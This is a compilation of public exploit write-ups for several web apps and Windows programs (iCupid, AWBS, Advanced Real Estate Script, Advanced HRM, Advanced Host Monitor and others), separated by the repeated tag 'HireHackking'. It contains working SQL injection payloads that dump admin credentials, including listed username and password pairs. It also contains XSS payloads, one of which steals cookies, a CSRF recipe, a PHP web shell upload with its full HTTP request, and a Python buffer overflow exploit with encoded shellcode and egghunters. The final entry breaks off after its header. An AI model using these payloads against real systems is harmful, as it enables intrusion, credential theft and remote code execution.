# Exploit Title: iCupid Dating Software 12.2 - SQL Injection
# Dork: N/A
# Date: 15.08.2017
# Vendor Homepage : https://www.advandate.com/
# Software Link: https://www.advandate.com/dating-software-features/
# Demo: https://demo.advandate.com/
# Version: 12.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?dll=music&sub=search&keyword=[SQL]
# '+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''='
# 
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Advanced World Database 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advanced-world-database/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/city.php?country=[SQL]&state=[SQL]
# http://localhost/[PATH]/state.php?country=[SQL]
# 
# Parameter: country (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: country=Russian Federation' AND 6933=6933 AND 'kVcM'='kVcM&state=Moskva
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: country=Russian Federation' AND SLEEP(5) AND 'ZbHT'='ZbHT&state=Moskva
# 	
# # # # #
HireHackking 
# Exploit Title: Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)
# Date: 06/01/2021
# Exploit Author: Rahul Ramakant Singh
# Vendor Homepage: https://www.awbs.com/
# Version: 3.7.0
# Tested on Windows

Steps:

1. Login into the application with the help of email and password.
2. Navigate to my additional contact page and add one contact for the same
3. Now there is option for delete the contact from the list.
4. Now Logout from the application and same create a one CSRF POC having having action of delete contact and same blank the token value from CSRF POC.
5. Now again login into the application and Send a link of this crafted page(generated CSRF POC) to the victim.
6. When the victim user opens the link, a script present on the crafted page sends a request for delete of contact to the server with an active session ID of the victim and accept the blank token value from the request.
7. Contact successfully deleted.
HireHackking 
AWBS v2.9.6 Multiple Remote Vulnerabilities


Vendor: Total Online Solutions, Inc.
Product web page: http://www.awbs.com
Affected version: 2.9.6
Platform: PHP

Summary: Whether starting new or looking to expand your
existing web hosting and/or domain registration business,
the AWBS fully automated solutions and unique features will
allow you achieve your goal with minimum effort and cost.

Desc: AWBS suffers from multiple SQL Injection vulnerabilities.
Input passed via the 'cat' and 'so' GET parameters are not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code. Multiple cross-site scripting vulnerabilities were also
discovered. The issue is triggered when input passed via multiple
parameters is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.

Tested on: Apache
           PHP/5.3.28
           MySQL/5.5.50-cll


Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
                            @zeroscience


Advisory ID: ZSL-2016-5337
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5337.php


08.06.2016

--


1. SQL Injection:
-----------------

Parameter: cat, so (GET)
POC URL:
http://localhost/admin/omanage.php?search=1&cat=status%27&list=1&so=status
http://localhost/admin/hostingadmin.php?list=f&so=domain%27
http://localhost/admin/aomanage.php?search=1&cat=status%20UNION%20select%201,2,3,version%28%29,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&list=3&so=status'
http://localhost/admin/hostingarchiveadmin.php?search=1&cat=status UNION select 1--&list=1&so=status'
http://localhost/admin/dsarchiveadmin.php?search=1&cat=status&list=3&so=31
http://localhost/admin/domainadmin.php?search=&cat=&list=&sd=&so=100



2. Cross-Site Scripting (Stored):
---------------------------------

http://localhost/admin/cmanage.php
Parameters: reason (POST)

Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

http://localhost/admin/helpdesk.php
Parameters: hd_name, hd_url, hd_subject (POST)

Payload(s):
Content-Disposition: form-data; name="hd_name"

"><script>alert(1)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_url"

"><script>alert(2)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_subject"

<img src=x onerror=alert(3)>
-----------------------------28698210634144



3. Cross-Site Scripting (Reflected):
------------------------------------

http://localhost/admin/useradmin.php
Parameters: list (POST)

http://localhost/admin/omanage.php?search=1%22%3E%3Cscript%3Ealert%283%29%3C/script%3E&cat=status%22%3E%3Cscript%3Ealert%284%29%3C/script%3E&list=4%22%3E%3Cscript%3Ealert%282%29%3C/script%3E&so=status%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameters: search, cat, list, so (GET)

http://localhost/admin/ccmanage.php?find_enc=1&list=1%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameter: list (GET)

http://localhost/admin/cmanage.php?edit=1&action=edit&add_credits=1&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&search=&cat=&list=&sd=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E
Parameters: id, sd (GET)

Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
HireHackking 
# Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
# Author: Jair Amezcua
# Date: 2020-11-10
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/es/advancedsystemcarepro.php
# Version : 13.0.0.157
# Tested on: Windows 10 64bit(EN)
# CVE : N/A

# 1. Description:
# Unquoted service paths in Advanced System Care Service 13  v13.0.0.157 have an unquoted service path.

# PoC
===========

C:\>sc qc AdvancedSystemCareService13
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AdvancedSystemCareService13
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
        LOAD_ORDER_GROUP   : System Reserved
        TAG                : 0
        DISPLAY_NAME       : Advanced SystemCare Service 13
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem



#Description Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path 
# undetected by the OS or other security applications where it could potentially be executed during 
# application startup or reboot. If successful, the local user's code would execute with the elevated 
# privileges of the application.
HireHackking 
# # # # # 
# Exploit Title: Advanced Real Estate Script 4.0.7 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advanced-real-estate-script/
# Version: 4.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/search-results.php?Projectmain=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 2)
# http://localhost/[PATH]/search-results.php?proj_type=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!05555Select*/+export_set(5,@:=0,(/*!05555select*/+count(*)/*!05555from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!05555table_name*/,0x3c6c693e,2),/*!05555column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 3)
# http://localhost/[PATH]/search-results.php?searchtext=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 4)
# http://localhost/[PATH]/search-results.php?sell_price=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 5)
# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
# 
# -1022220'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 6)
# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
# 
# -45'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Advanced Real Estate Script v4.0.6 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/advanced-real-estate-script/
# Demo: http://www.phprealestatescript.org/advanced_realestate/
# Version: 4.0.6
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/state.php?country=[SQL]
# http://localhost/[PATH]/city.php?city=[SQL]
# http://localhost/[PATH]/locat.php?locat=[SQL]
# For example;
# -1'+/*!50000union*/+select+1,2,3,4,@@version,6-- -
# -1'+/*!50000union*/+select+1,2,3,4,5,@@version,7,8,9-- -
# -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8-- -
# Etc... Etc...
# # # # #
HireHackking 
# Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site
Scripting (XSS) (Authenticated)
# Date: 11.10.2023
# Exploit Author: Furkan ÖZER
# Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/
# Version: 8.0.5
# Tested on: Kali-Linux,Windows10,Windows 11
# CVE: N/A


# Description:
Advanced Page Visit Counter is a remarkable Google Analytics alternative
specifically designed for WordPress websites, and it has quickly become a
must-have plugin for website owners and administrators seeking powerful
tracking and analytical capabilities. With the recent addition of Enhanced
eCommerce Tracking for WooCommerce, this plugin has become even more
indispensable for online store owners.

Homepage | Support | Premium Version

If you’re in search of a GDPR-friendly website analytics plugin exclusively
designed for WordPress, look no further than Advanced Page Visit Counter.
This exceptional plugin offers a compelling alternative to Google Analytics
and is definitely worth a try for those seeking enhanced data privacy
compliance.

This is a free plugin and doesn’t require you to create an account on
another site. All features outlined below are included in the free plugin.

Description of the owner of the plugin Stored Cross-Site Scripting attack
against the administrators or the other authenticated users.

The plugin does not sanitise and escape some of its settings, which could
allow high privilege users such as admin to perform Stored Cross-Site
Scripting attacks even when the unfiltered_html capability is disallowed
(for example in multisite setup)

The details of the discovery are given below.

# Steps To Reproduce:
1. Install and activate the Advanced Page Visit Counter plugin.
2. Visit the "Settings" interface available in settings page of the plugin
that is named "Widget Settings"
3. In the plugin's "Today's Count Label" setting field, enter the payload
Payload: " "type=image src=1 onerror=alert(document.cookie)> "
6. Click the "Save Changes" button.
7. The XSS will be triggered on the settings page when every visit of an
authenticated user.


# Video Link
https://youtu.be/zcfciGZLriM
HireHackking 
# # # # # 
# Exploit Title: Advanced Matrimonial Script v2.0.3 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/advanced-matrimonial/
# Demo: http://74.124.215.220/~admatrimon/
# Version: 2.0.3
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/photoalbum.php?userid=[SQL]
# http://localhost/[PATH]/members_result.php?match_result=[SQL]
# http://localhost/[PATH]/search_result.php?cityse=Basic+Search&gender=Male&age_from=[SQL]&marital=[SQL]&religion=[SQL]&caste=[SQL]&country=[SQL]&education=[SQL]&Submit=Search
# For example;
# photoalbum.php?userid=-22'+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),86,87,88,89-- -
# status:adminlogin
# admin_id:adminlogin
# admin_username:adminlogin
# admin_password:adminlogin
# admin_email:adminlogin
# photoalbum.php?userid=-22'+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,/*!50000concat(*/admin_username,/*!50000char*/(58),admin_password),86,87,88,89+from+adminlogin-- -
# <input type="hidden" name="userid" value="admin:inetsol" />
# <input type="hidden" name="userid" value="raj:123456" />
# <input type="hidden" name="userid" value="sath:123456" />
# Etc... Etc...
# # # # #
HireHackking 
source: https://www.securityfocus.com/bid/49457/info

YABSoft Advanced Image Hosting Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Advanced Image Hosting Script 2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/demo/aihspro/report.php?img_id=[XSS]
HireHackking 
# Exploit Title: Advanced HRM 1.6 - Remote Code Execution
# Google Dork: intext:"Advanced HRM" 
# Date: 2018-10-06
# Exploit Author: Renos Nikolaou
# Vendor Homepage: https://coderpixel.com/
# Software Link: https://codecanyon.net/item/advanced-hrm/17767006
# Version: 1.6
# Tested on: Windows 10
# CVE: N/A
# Description : Advanced HRM 1.6 allows users to upload arbitrary files which 
# leads to a remote command execution on the remote server.

# PoC
# 1) Create a php file with the below code:

<?php $cmd=$_GET['cmd']; system($cmd); ?>

# 2) Login to Advanced HRM portal as low priviliage user
# 3) At the right hand side go to Update Profile --> Change Picture ( http://domain/hrm/user/edit-profile )
# 4) Click Browse and upload your file containing the PHP code mentioned at step 1. 
# 5) Click Update
# 6) Right click at the Profile image and select Copy image Location
# 7) Paste the URL into your browser. Will be similar to: http://domain/hrm/assets/employee_pic/cmd.php
# 8) Verify the exploit: http://domain/hrm/assets/employee_pic/cmd.php?cmd=id

# The request:
===================

POST /hrm/user/update-user-avatar HTTP/1.1
Host: domain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain/hrm/user/edit-profile
Content-Type: multipart/form-data; boundary=---------------------------6610657524685
Content-Length: 378
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------6610657524685
Content-Disposition: form-data; name="image"; filename="cmd.php"
Content-Type: application/octet-stream

<?php $cmd=$_GET['cmd']; system($cmd); ?>

-----------------------------6610657524685
Content-Disposition: form-data; name="_token"

yWFLEpnGV1n5OzK7sAPWg6UVJG02Q
-----------------------------6610657524685--
HireHackking 
# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
# Date: 2023-04-23
# CVE: CVE-2023-2417
# Exploit Author: MrEmpy
# Vendor Homepage: https://www.ks-soft.net
# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
# Version: > 12.56
# Tested on: Windows 10 21H2


Title:
================
Advanced Host Monitor > 12.56 - Unquoted Service Path


Summary:
================
An unquoted service path vulnerability has been discovered in Advanced Host
Monitor version > 12.56 affecting the executable "C:\Program Files
(x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when
the service's path is misconfigured, allowing an attacker to run a
malicious file instead of the legitimate executable associated with the
service.

An attacker with local user privileges could exploit this vulnerability to
replace the legitimate RMA-Win\rma_active.exe service executable with a
malicious file of the same name and located in a directory that has a
higher priority than the legitimate directory. That way, when the service
starts, it will run the malicious file instead of the legitimate
executable, allowing the attacker to execute arbitrary code, gain
unauthorized access to the compromised system, or stop the service from
functioning.

To exploit this vulnerability, an attacker would need local access to the
system and the ability to write and replace files on the system. The
vulnerability can be mitigated by correcting the service path to correctly
quote the full path of the executable, including quotation marks.
Furthermore, it is recommended that users keep software updated with the
latest security updates and limit physical and network access to their
systems to prevent malicious attacks.


Proof of Concept:
================

C:\>sc qc ActiveRMAService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveRMAService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files
(x86)\HostMonitor\RMA-Win\rma_active.exe /service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KS Active Remote Monitoring Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking 
#!/usr/bin/env python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow (EggHunter)                                                      #
# Date: 2019-03-18                                                                                                                   #
# Author: Peyman Forouzan                                                                                                            #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit                                   #
# Software Download #1: https://www.ks-soft.net/download/hm1192.exe                                                                  #
# Software Download #2: https://www.ip-tools.biz/download/hm1192.exe                                                                 #
# Version: 11.92 beta                                                                                                                #
# The Program also has SEH Overflow, Which can be implemented in a similar way                                                       #
# Special Thanks to my wife                                                                                                          #
# Steps : Open the APP --> Tools --> Trace (or Telnet) --> paste in contents from the egg.txt into "Host" --> Start --> Close        #
#         Advanced Host Monitor --> Options --> Startup --> paste in contents from the egghunter-winxp-win7.txt or                   #
#         egghunter-win10.txt (depend on your windows version) into "load specific HTML file" --> Save --> Wait a litle -->          #
#         Shellcode (Calc) open                                                                                                      #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite                                                            #
#------------------------------------------------------------------------------------------------------------------------------------#

#---------------------------------------------------   EGG Shellcode Generation    ---------------------------------------------------

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
egg =  "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

#-----------------------------------------------   EGG Hunter Shellcode Generation    ----------------------------------------------

#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters 

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter =  "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"

# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 =  "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"

eip = "\x4d\x37\x41"

buffer = egghunter + "\x41" * (268 - len(egghunter)) + eip

f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (268 - len(egghunter10)) + eip
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()
HireHackking 
# Exploit Title: Advanced Host Monitor 11.90 Beta - 'Registration number' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-30
# Vendor Homepage: https://www.ks-soft.net
